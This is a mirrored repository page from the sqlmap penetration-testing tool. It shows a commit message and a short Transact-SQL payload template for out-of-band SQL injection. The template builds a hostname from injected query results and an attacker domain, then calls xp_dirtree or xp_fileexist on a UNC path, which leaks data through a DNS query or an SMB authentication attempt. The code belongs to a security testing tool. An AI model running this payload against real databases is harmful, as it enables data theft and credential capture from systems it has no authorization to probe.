mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-05-10 10:43:44 +03:00
4d259790cd
Modified the xp_dirtree and xp_cmdshell UNC paths to use forward slashes instead of backslashes, and removed the space between the procedure name and quoted path. These changes help to avoid escaping/encoding issues, for example when using JSON. MSSQL still handles it the same way and will cause a DNS query or SMB authentication attempt.
5 lines
195 B
Transact-SQL
5 lines
195 B
Transact-SQL
DECLARE @host varchar(1024);
|
|
SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
|
|
EXEC('master..xp_dirtree"//'+@host+'/%RANDSTR1%"')
|
|
# or EXEC('master..xp_fileexist"//'+@host+'/%RANDSTR1%"')
|